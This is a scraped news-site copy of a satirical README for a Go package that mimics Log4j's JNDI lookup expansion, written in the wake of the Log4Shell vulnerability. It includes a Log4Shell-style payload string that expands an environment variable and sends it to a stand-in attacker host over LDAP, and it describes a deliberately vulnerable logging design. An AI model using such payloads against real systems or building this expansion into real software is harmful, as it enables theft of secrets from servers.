• Latest
  • Trending

Jndi: An irresponsibly bad logging library

December 11, 2021
BTS ARMY trends ‘JUNGKOOK CAME HOME’ as he returns on Instagram to praise J-Hope’s Lollapalooza concert [View Tweets]  

BTS ARMY trends ‘JUNGKOOK CAME HOME’ as he returns on Instagram to praise J-Hope’s Lollapalooza concert [View Tweets]  

August 11, 2022

Munawar Faruqui-Anjali Arora to Prince Narula-Nora Fatehi: Ahead of Bigg Boss 16, Nach Baliye 10, Jhalak Dikhhla Jaa 10; a look at fake love stories on reality shows

August 11, 2022

Indian Idol 13 to be all scripted and fake? Latest promo receives severe flak from netizens

August 11, 2022

Pushpa 2: Allu Arjun is busy doing THIS whilst shooting for the film gets stalled [VIEW PIC]

August 11, 2022

Yeh Rishta Kya Kehlata Hai, Taarak Mehta Ka Ooltah Chashmah, Udaariyaan and more popular TV shows that were shot at foreign locations to boost dipping TRPs

August 11, 2022

Harry Styles’ Full ‘X Factor’ Audition Included a Train Song, Bakery Banter With Simon Cowell

August 11, 2022

Hear Murder In Space’s Surging Instrumental Rock Debut EP ‘Welcome Home’

August 11, 2022

Netflix Slams Unofficial ‘Bridgerton’ Musical Creators in Copyright Infringement Lawsuit

August 11, 2022

RPG Cast – Episode 622: “Secret Maple Syrup Agent”

August 11, 2022

FIFA and F1 drive EA to Q1 growth

August 11, 2022

Google Play adds new rules on interstitial ads

August 11, 2022

Creature feature: An expert’s guide to making memorable monsters

August 11, 2022
Retail
Thursday, August 11, 2022
Submit Your Post
  • Login
  • Register
  • Tech
  • Science
  • Entertainment
  • Sport
  • Health
  • Lifestyle
  • World
  • Celebrities
  • Sports
No Result
View All Result
Live24x7.news
No Result
View All Result

Jndi: An irresponsibly bad logging library

by News Editor
December 11, 2021
in Science, Tech
0

YOU MAY ALSO LIKE

How power-guzzling graphics cards affect the rest of your PC

Nextbase Dash 320XR dash cam review: More style than substance

Is CVE-2021-44228 making you feel left out as a Go programmer?

Fear not. We can fix that.

I wouldn’t use this package, but if you want to…

package main

import "github.com/bradfitz/jndi"

var logger = jndi.NewLogger()

func main() {
	//...
}

func handleSomeTraffic(r *request) {
        logger.Printf("got request from %s", r.URL.Path)
}

Congrats, the user actually wrote ${jndi:ldap://attacker.example/${env:${lower:u}ser}} and
the logger expanded your environment variable and sent it over the network
as a side-effect of logging.

Inspiration

I saw https://twitter.com/_StaticFlow_/status/1469358229767475205 and thought it’d
be fun to write an expander while I was bored, stuck in transit.

Bugs

This package is incomplete. log4j actually does a bunch more:

  • https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution
  • https://logging.apache.org/log4j/2.x/manual/lookups.html

Patches welcome to help flesh this package out. We’ve got some
catching up to do.

Apologies

In case you’re seeing this on GitHub and not via Twitter, I acknowledged
that this is questionable taste: https://twitter.com/bradfitz/status/1469523985998118925

In general I believe in the whole #hugops thing. I had a CVE filed against
my own code just the day before: https://twitter.com/bradfitz/status/1469015417679081472

It happens. I joke to cope.

Read More
Photo Credit:

Tags: irresponsiblylogging
ShareTweetShare
  • Tech
  • Science
  • Entertainment
  • Sport
  • Health
  • Lifestyle
  • World
  • Celebrities
  • Sports
Email:live24x7.news.official@gmail.com Call/Whatsapp us: +965 525693614

© 2022 Live24x7.news

No Result
View All Result
  • Tech
  • Science
  • Entertainment
  • Sport
  • Health
  • Lifestyle
  • World
  • Celebrities
  • Sports

© 2022 Live24x7.news

Welcome Back!

Login to your account below

Forgotten Password? Sign Up

Create New Account!

Fill the forms below to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In